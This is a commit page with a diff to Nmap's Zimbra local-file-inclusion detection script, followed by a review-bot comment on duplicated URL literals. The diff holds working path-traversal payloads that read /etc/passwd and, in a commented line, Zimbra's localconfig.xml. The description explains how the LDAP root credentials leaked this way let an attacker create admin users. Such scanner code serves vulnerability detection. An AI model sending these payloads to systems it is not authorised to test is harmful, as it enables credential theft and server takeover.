
Patch from Paul AMAR to fix http-vuln-zimbra-lfi

http://seclists.org/nmap-dev/2014/q1/130
dmiller
2014-02-07 15:54:12 +00:00
parent fb67a6717e
commit bf26986685


@@ -66,7 +66,7 @@ action = function(host, port)
state = vulns.STATE.NOT_VULN, -- default
description = [[
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see any file on the filesystem, including config files
that contain LDAP root credentials, allowing us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
@@ -87,8 +87,8 @@ This issue was patched in Zimbra 7.2.6.
local file_long = "../../../../../../../../../etc/passwd"
--local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml"
local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
stdnse.print_debug(1, "Trying to detect if the server is vulnerable")
stdnse.print_debug(1, "GET " .. uri .. escape(url_short))
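Review bot: The long `/res/...Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=` literal is spelled out separately in `url_short` and `url_long` (and again in the description text), so a one-character slip in any copy changes what is requested. Because the report state defaults to `vulns.STATE.NOT_VULN`, a malformed path presumably produces a clean-looking result rather than an error, which is the kind of false negative this fix addresses. Building both URLs from one local would keep them in step: `local res_path = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin="`, then `local url_short = res_path .. file_short .. "%00"` and `local url_long = res_path .. file_long .. "%00"`. `file_short` and the rest of `action` lie outside the visible hunks, and the page has lost its `+`/`-` markers, so this assumes the `%20` lines are the new side.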